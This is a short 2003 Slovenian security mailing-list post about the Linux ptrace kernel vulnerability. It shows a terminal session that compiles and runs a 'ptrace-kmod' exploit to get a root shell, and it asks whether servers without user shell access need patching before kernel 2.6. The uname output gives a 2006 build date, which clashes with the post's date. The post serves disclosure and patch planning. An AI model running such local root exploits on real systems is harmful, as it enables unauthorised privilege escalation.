Ptrace vulnerability se enkrat

Nejc Skoberne nejc.skoberne at guest.arnes.si
Tue Apr 15 16:29:11 CEST 2003


Zdravo.

Stvar je kar resna:

nejko at Stinker:~$ gcc -o ptrace-kmod ptrace-kmod.c
nejko at Stinker:~$ ./ptrace-kmod
[+] Attached to 1967
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000f287
[+] Now wait for suid shell...
sh-2.05a# uname -a
Linux Stinker 2.4.20 #3 SMP Mon Apr 3 23:47:03 CEST 2006 i586 unknown

Pri streznikih, pri katerih uporabniki nimajo shell dostopa - a se
splaca patchati ali pocakati na 2.6?

-- 
Nejc Skoberne
Grajska ulica 5
SI-5220 Tolmin
E-mail: nejc.skoberne at guest.arnes.si




More information about the lugos-sec mailing list